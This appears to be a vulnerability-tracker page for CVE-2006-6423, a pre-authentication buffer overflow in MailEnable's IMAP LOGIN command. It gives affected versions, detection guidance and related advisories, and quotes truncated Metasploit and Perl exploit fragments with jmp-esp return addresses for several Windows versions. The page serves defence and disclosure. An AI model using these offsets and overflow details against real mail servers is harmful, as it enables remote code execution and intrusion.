CVE-2006-6423
published 2006-12-12CVE-2006-6423: Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.04%
99.2th percentile
Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.
Affected
53 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xf8\xfe\x5a\x7c (jmp esp Win2K Server SP4 KERNEL32.dll 5.0.2195.7099)
bytes↗
\xe2\x48\xe6\x77 (jmp esp WinXP SP0 KERNEL32.dll 5.1.2600.0)
bytes↗
\x06\x38\xe6\x77 (jmp esp WinXP SP1 KERNEL32.dll 5.1.2600.11061)
bytes↗
\xd9\xae\x80\x7c (jmp esp WinXP SP2 KERNEL32.dll 5.1.2600.21802)
bytes↗
\x62\x51\xeb\x77 (jmp esp Win2K3 SP1 KERNEL32.dll 5.2.3790.18300)
- →Detect IMAP LOGIN command with a literal size specifier (curly-brace notation) followed by an oversized payload — the exploit sends a LOGIN command with a literal argument (e.g., {10}, {24}, {1022}) and then a buffer of 556+ bytes to overflow the stack. ↗
- →Alert on IMAP LOGIN literal continuation payloads exceeding ~550 bytes on TCP port 143, which is the overflow threshold used by all known exploit variants. ↗
- →A bind shell on port 1337 is spawned by the shellcode after successful exploitation; monitor for unexpected listening services on port 1337 on Windows IMAP servers. ↗
- →The Metasploit module targets MEAISP.DLL at a fixed return address (0x10049abb); presence of this DLL with this version in a MailEnable installation indicates a vulnerable target. ↗
- →The exploit uses bad characters \x00\x0a\x0d\x20 in payload construction; IMAP traffic containing long runs of uppercase alpha characters (rand_text_alpha_upper) immediately after a LOGIN literal continuation is a strong indicator of exploitation. ↗
- →The EXITFUNC is set to 'thread', meaning the IMAP service process survives exploitation; look for anomalous child threads spawned from the MailEnable IMAP process after a malformed LOGIN sequence. ↗
- ·The Metasploit module only has a single hardcoded target (MailEnable 2.35 Pro with a specific MEAISP.DLL return address); the Perl exploits cover versions 2.32–2.35 with OS-specific jmp-esp gadgets from KERNEL32.dll, so detection must account for multiple return addresses across OS versions. ↗
- ·CVE-2006-6423 (buffer overflow in LOGIN) is explicitly noted as a different issue from CVE-2006-6484 (null pointer dereference in IMAP service); detections should not conflate the two vulnerabilities. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ff9v-9xjv-cj27: Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2
ghsa_unreviewed·2022-05-01
CVE-2006-6423 [HIGH] GHSA-ff9v-9xjv-cj27: Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2
Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.
GHSA
GHSA-5crp-85wp-vwcp: The IMAP service for MailEnable Professional and Enterprise Edition 2
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2006-6484 [CRITICAL] GHSA-5crp-85wp-vwcp: The IMAP service for MailEnable Professional and Enterprise Edition 2
The IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.34, Professional Edition 1.6 through 1.83, and Enterprise Edition 1.1 through 1.40 allows remote attackers to cause a denial of service (crash) via unspecified vectors that trigger a null pointer dereference, as addressed by the ME-10023 hotfix, and a different issue than CVE-2006-6423. NOTE: some details were obtained from third party information.
GHSA
GHSA-qh23-548p-jvf7: Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2007-1301 [CRITICAL] GHSA-qh23-548p-jvf7: Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2
Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2.37 and earlier allows remote authenticated users to execute arbitrary code via a long argument to the APPEND command. NOTE: this is probably different than CVE-2006-6423.
No detection rules found.
Exploit-DB
MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-6423 MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)
MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)
---
##
# $Id: mailenable_login.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MailEnable IMAPD (2.35) Login Request Buffer Overflow',
'Description' => %q{
MailEnable's IMAP server contains a buffer overflow
vulnerability in the Login command.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-6423'],
[ 'OSVDB', '32125'],
[ 'BID', '21492'],
[ 'URL', 'http://
Exploit-DB
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else
Exploit-DB
MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
MailEnable IMAPD Enterprise 2.32 jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $STAR
Metasploit
MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
metasploit
MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.
No writeups or analysis indexed.
http://secunia.com/advisories/23201http://secunia.com/secunia_research/2006-73/advisory/http://securityreason.com/securityalert/2022http://www.mailenable.com/hotfix/http://www.securityfocus.com/archive/1/454075/100/0/threadedhttp://www.securityfocus.com/bid/21492https://exchange.xforce.ibmcloud.com/vulnerabilities/30796http://secunia.com/advisories/23201http://secunia.com/secunia_research/2006-73/advisory/http://securityreason.com/securityalert/2022http://www.mailenable.com/hotfix/http://www.securityfocus.com/archive/1/454075/100/0/threadedhttp://www.securityfocus.com/bid/21492https://exchange.xforce.ibmcloud.com/vulnerabilities/30796
2006-12-12
Published